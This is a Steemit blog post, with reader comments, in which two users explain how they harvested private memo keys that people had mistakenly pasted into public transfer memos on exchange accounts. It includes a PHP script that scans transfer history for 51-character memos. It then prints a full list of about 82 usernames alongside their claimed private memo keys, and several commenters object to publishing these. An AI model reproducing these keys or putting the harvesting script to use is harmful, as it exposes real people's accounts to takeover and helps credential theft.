We Just Hacked 82 Steemit Account With An Estimated of ~$95,368 USD in control, but we are good guys...

in steemit •  2 years ago

U5dquHruSDBpcdrqdHRckUXGTqnDjAW_1680x8400.jpg
Image credits: source

Me @davidk and my friend @ralphhovsepian got access to 82 steemit account private memo keys while trying some of our scripts.

Notice:
-we did not hack the steemit blockchain
-we did not steal any money
-we did not use any social engineering

This bug is not very popular although many people are talking about it. It is when you transfer steem and steem dollar and put your private memo key or your password in the memo box which is public.

Here is how we did it

-we used the new SteemPHP which is located at (https://github.com/davidkevork/steemphp)

< ?php   <-- remove the space
include './vendor/autoload.php';
use SteemPHP\SteemConnection;
$SteemConnection = new SteemConnection('https://steemd.steemit.com');
$account = 'bittrex';
for ($i=0; $i < 86; $i++) {
    $collect = [];
    if ($i = 0) { $l = -1; } else { $l = $i * 1000; }
    $data = $SteemConnection->getAccountHistory($account, 1000, $l);
    foreach ($data as $key => $value) {
        if ($value[1]['op'][0] == 'transfer') {
            if (strlen($value[1]['op'][1]['memo']) == 51) {
                $collect[] = $value[1]['op'][1]['from'].':'.$value[1]['op'][1]['to'].':'.$value[1]['op'][1]['memo'];
            }
        }
    }
    file_put_contents($account.'_'.$i, serialize($collect));
}
?>

we analysed the entire trading history of bittrex, poloniex and blocktrades which in total is over 50,000 transfer and got access to 82 active private memo keys.

while we found passwords and more private memo keys, the account owner has changed them.
here is the list of the accounts with their private memo keys.

usernamememo key
jacob.martin5HwKNiwtHe4YEk2vDhiRPt6cbViAxjmW31i9La8iGufdK28us2p
shaneit5KPKMftui7afrmDG1FiLYQ8Jx4grR89qRKQiFDm546BWuX33JJH
tarquinmaine5HqnCMcpyKraSJKK1Zyg6xNMhYiSt7u7Xr84X86ozrZ26HwQdrM
athleteyoga5KU2dcxLpSCJZ4SB8eBqUJs2PCEuwfx7w2XYCUmcnLqgdHHqjq2
murat5K8R2J7xiLRN3HWdAy5Zym4taE74o9DWF8FV82HHFrqNUZDzdxW
lostnuggett5JEKwfrtSEFvw8P8qnWyDhfxnQTRB5Vn2WxwW3tE4gL4pZiwPcQ
nikolad5KdeDUj92w2HXsLH6V6SpNGPAeyBtJEU5jVoqZyjaHDkE39AkzF
norbu5J5HyEwx54MwKW8gpsSBzvwAweHRjH11CXs85RCNWSooyPYRaeh
inphinitbit5J9uWL39vDYgEosscgxEziYQ2ybPbxM5e9sPkzTxgqTgNYC7Mx7
churchsoftware5KB3B3rHxvvaR3C2gfNyKkkReqdfbsjPs4AZ8ceiiR4B49oCDmJ
mama-c5HqAhZBvbBJKVWJ1tsrg7xnS1dvNNyxBoHzp8Snvp9C6Uawx66x
writemore5JJTZpTEvw4C7cnU7Q9NfzUnXSYqwYLLxkP7B3c39Z82Uwzj14d
nathanhollis5Kk1N4nxMPbqVuJCVt3MUjz5dvJR716cUAdf6c3kToqzMqT8rRu
cryptowaffles5KRwDaAACzyeLS7mnW66XVqdZCx6iRxwiwXVYxRDB4XkK8GYLcg
dattabitcoin5JCsWSu1wj7ynCBoMJyGE7G2hbSgBhoAeRzYZWeQrEP3iArMqz9
hingedthomas5JtBsXesxSw8v5oDbo5sgyjzQBHbQQgK6KRGwz2FyckMVbKwpFQ
marshallevans5HzSBZKoRrpywHykT5DY4nhb64sCxM9hwxooZfqYynvNVMVhNCw
sandman19235KXPMrMVyZJwg264vaQnbdPaaEhLLuMoU8JonujJDWVTyKoReY3
alesuperlano5KgyKE4MpdRmMmGxL3nSgbamhqDBP1UJMp6YDkEeLwh9zc4MJs8
toniesteem5JPtVB84rD6qExui5W3R8eD3kb9m4mqGVSvFX4hcffBreF1VGSf
luvbnamome5K7pdhDeiB5YWP4Fp64uMiWbDnNBNPGnDHNqJymS3EAGJCncika
andrewgenaille5KCgT8Fyydtx8ANTQGjacxP1iYR3YLpbvCznXUrHYJ5tiKnF3Av
leesmoketree5Kctn9BvtxB3CXzzX4GMcmLygq42LqisCZr5MAy7VYPzvwX5o7u
alexab5J8Vt4pkmELZyVHhob17zwamh8RVMpRvoTqW5yYDsywSzwyJu9H
jimmydicarlo5KcxWxHm5DPo4snzr4GeR8ZcYVMgZTQnvwDvye88TcSNdRo58Kn
xplicit5JSbj2AtK4pTmHKDh7c3xsYKy41ndnYrV94UUb5LXKWf5eFX5RS
lightproject5JyZS8HUgaEJGbUdWyUnVrPKpQnKBSzWG7A3pdFsk44srBUQvBJ
runridefly5K2PBFRVeGKx4fVjBc8d8gcFNXqEbSkp5ghKQzW2H5soDzgtx4o
antonlive5KDP8R9KbQVfNeSxs4aNpMcEjC1xrovkNHsCveZrNR5hd3g9NeV
fidesustradis5Kb4KftPhsoqtaiKfjZUqzHDYdPSeeposVwNoJC2eMGCAhh5BxF
zarch955Jng1bcw7YdkM6MVoKvmsDYrvv3ny4e7njoUU5tXXqZsteihYVY
alekiwi5Kf1mDMHQWYKnZ92YFPjcQhCBmuZp67d9ainaefZLcdNEBVDpR5
asamhusayn5JntUeKfFMhs29jQPF7CQ6mY2Vy2woJGyWsJWhXJEucfBEazniW
jmwinch5KC3SA4PBM7KwBHn3vGJ9QZRoDVaaZNTWu835H458mqdULPxzoc
stellarinvestor5KMrskMG7Eji3VGHtAumjeRSaGqKHsz3MLnuMuciHKCBMR5A2Yq
thebaek5Jico2CC8Rb37qrTa4csouyjB68zXG4hkMWbrzV73Ss49VRYvZk
lulzim5HvSmAhxFVD19B9W5smT1aES76syi9YsmfVRtMGChpGckmoPTzs
mallorca5JyCGGUFSBNe2prqAqjbYzXZkohf1mYbXP1iavZm7G3yaeqniYF
stocka5KY92W7auZHkrqqHW9AdpUViBK3EeeJ72H816ZFdvgREeF1tetn
shockstar5J7A7tbqmMs1riVhNTDLMfRKY63qzgByYwzY3EgimUY39r4RDc2
carlosgarcia5Jzwwxeura2PitVia9GJwcoyqK3jwyChQ1xGBYPCBhTxZuqKEiZ
witze5KcDr6Xc1rZt1RqrdmVkuJ3cJfym8DMupcy37XNS8ruvAPH9n3q
bitdollar5KjrByjr4GLjyKyKH9JtMg7NPMeYaffBTWui6FdU6jziDj2rMgS
bulleye885KDwjiLtPjwumUt86iQpRohT2ej4W6q1SvSTVPkPSEbBbxzVSJX
piotras5J2ynjeVeWsPBUafwuMqWtMPYSFvTf3jqcMoyhjx4Xw7zjQ9D6U
francoisstrydom5Jkw1HdHc1ucwTosaqhXVAhyG848d1ZJprQsrwP1UEctazBvU3D
hoanghiep19905HwhbBTw2U7361wa55SEhmnkPFzLbNFbGbh5UfPTTgrfExNipus
rawmeen5JnLMoPRry2n361tPxQq7MYy16tn5PuT2PmsP1FLrRGJsp1Vfem
tee-em5KPT9Nhtho3qaAFkGQ4zqy7Dae1729WdYM5wL3UPyKVuTauonif
smisi5Hsre3qaCDBcxwGiig5qFc65dwf2NfAssUUTXfCWFmbhbxPz7bL
dollarvigilante5Hqzx26rSmSJ2o5VB8gicf3F2Q6BU35n1nMNajcEmDxMietvUVx
cryptoeasy5JNv71NgwCRUDAQu1NP67TDRVHKmRnnGLRfNFMwAKS8fTMLvLkQ
iaco5JTYW5HfPJJX47VRT1Cq9Nz8aSruWKhETiD6oo9GPJNteQ5RPke
richarddean5JPPUidz7rPN6VPHFJQbjnh8a3JQCDzP7fJSt93EQkUeLr3gmJJ
luani5Jo7p98JCpTiH1q9kVC81etym4QSHRRpLDvxumRW7BXouDu8Yfd
colombiana5JaewDd6gw4AjXGhABCdZk2FHrwxHJnJDWZmkUzJYuny6rarbf3
beeridiculous5KHkKyHpxDBuuKGt5QwTbb42bxmMUo1Xk9efBKU7wUoRed2Ak8z
maxfuchs5J9CvSGNyLBgUwhKtsTWCqTddbDZJ4tFrVSyWFzDstsQiG9spPe
surpriseattack5K8Be3nW33Lc5vqRUJx3xmoLFnMMmJPMthYHb16i7R2gwFTJqh3
hithere5HxdErB3wPUDQKWEcjNBBWLpB1uJ8aMrY1tK5ZA1k56MqmTtT31
bryguy5JdJHDcgeqyaHEgmyTbob221RUvttqyRVVPViAMzuq4hWJKw6sa
theofphotography5KRJ9qt8E9o6KXFhfyW7PJH7sDsmSBVaBeC8SmLR5LmReQii44Y
jellos5JYXarzjE5afBtHcjhvdUcczrqCsfUEyxVRTKAFyDdjGatkTNNy
chuckles5KWf41ixGbPMpAxNhe47jtTVbyAi9Su4mZrHaVanYP2rQWoPUUk
amrsaeed5JqaDeu2s3BsG9QYenpz2xjLfg3qdaeWhXduYNUSmK7KWAywx93
dethie5K3BBi9pETRGG7KkS7VDrWY7exDCCi315prn2Mf9dTuR9vCejEH
bloodhound5JQZo8QDuQ1eDqsgMnVHg1ujqYNUTEDV4KYZyeSdbzSAbXMsSuV
lopezro5K6rmYGbHaGsAyGLpQMNupWcmjQFHvjX2GtYyCrC3KMgWAWcNci
bitlamb5JBZGzS1J12G9RLN8Pwhb9RvB9yicUPQBajh7z6fQSSSWSDWmvM
aresmari5KUvg3QJUu26PGAb4RE9XXHBQPXckT8iLGGsjxrvDY3F85Ta8RU
wakeupworldnews5JGeZXMxpF5LGn4rXboa4aGhprL2gJw3mPdYt23JHcSfQw5r7La
rottdean25JmbyhbJnKooVtTZ37f2vzV6eNZzQDKDZn3E4xHayFP3XVEvwQr
cwrz19765K4MPxEQaFAwGWWTJPhvhFcixXwmPuVBzAQ1EyHmq9q5buKhwmf
murtazasyedm5JSLXjkmEseNytqoxyRnKKxWau1ziqBiGKGB2MgVtYkQBzojy9E
big-ginger-fuck5JwPV4kkJhJyj9JqvKixxXYpXGvjXZH88C67MJGX71XZTGcmRwZ
acarl2115Hsa2amx9nM7MCRX1mjEjZe2xzX5sBj878AyFsb3i7rJXG3rBEN
edie845JAetePN5EnwnXW9FBTyw6E3tCvf9RtwAAWQQMybFvHPjq8Jn58
brandonas5JFUjW7GZ61eG7AYb6uKMo1fC5LRDiDNzD9f9FuBtSx1Zqrb2Vp
neilism5JGicrVfrxdwiYe44XHMo2xuUYs11a2uXjYB2HWqkECjaP9SYuD
fidesustradis5Kb4KftPhsoqtaiKfjZUqzHDYdPSeeposVwNoJC2eMGCAhh5BxF
namjovi5KiMquUaD8pkbqafnwpZJ4LSQR8ukNo64PBDj9jetY5eLipjuD2
medrivevan5J52Djm9QspRUEz3tYaLKEqpUVHUnMBkyskhG7CMxKBpBtaCucS

It is advised that everyone in the list to be aware next time and warn their friend and also change your passwords if possible and make sure your account is no more accessible with the memo key above.


U5ds9hEMnRvxCuJqQJYGLYsDjQ6NAoj_1680x8400.png
Image credits: source

inspired by @noisy

Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!
Sort Order:  

Crikey, this is a bit scarey, gotta be alert!

@noisy, it sort of reminded me of your post

wow dollarvigilante is in the list

·

Lmfao

I dont get it. Why would I put my private memo key in a public field?

·

Some people thing memo is for password and they put their private key/passwors there

·
·

I can't believe @dollarvigilante has done it too :]]]

·
·
·

I think you should not display their entire keys. You might not be a bad guy but somebody else might be and you're just giving them the keys...

·

their accounts can be accessed but the all the money is safe as they cant use this key to transfer any money

·
·

sry for misinterpretation...

Man, please don't post peoples passwords. You could just show them blurred out. Golos prolly has some of these same people on it, and those accounts are also now at risk.

I very much appreciate that you didn't take their money, and that you clearly intended to illuminate the problem so that people don't make this mistake anymore, or at least less often.

But, find a way to not dox these folks when you post about the problem.

Thanks!

·

these are not the passwords, they are just keys which you can use for login but not to upvote/comment/resteem or transfer any money

·
·

Yeah, those. Please don't publish those.

How careless to send private keys in a memo!